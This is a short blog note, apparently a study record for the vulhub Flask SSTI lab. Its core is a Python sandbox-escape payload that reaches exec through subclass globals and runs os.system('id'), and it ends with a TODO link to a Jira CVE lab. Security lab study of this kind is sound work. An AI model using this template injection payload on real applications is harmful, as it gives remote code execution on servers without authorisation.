SSTI

https://github.com/vulhub/vulhub/tree/master/flask/ssti


GlobalsAttrCount=0
for a in ().__class__.__base__.__subclasses__():
      if hasattr(a.__init__,'__globals__'):
            break
      GlobalsAttrCount += 1

().__class__.__base__.__subclasses__()[GlobalsAttrCount].__init__.__globals__['__builtins__']['exec']("__import__('os').system('id')")
                                               

TODO:https://github.com/vulhub/vulhub/tree/master/jira/CVE-2019-11581
参考

posted @ 2021-01-11 20:22  TaiiHu  阅读(191)  评论(3)    收藏  举报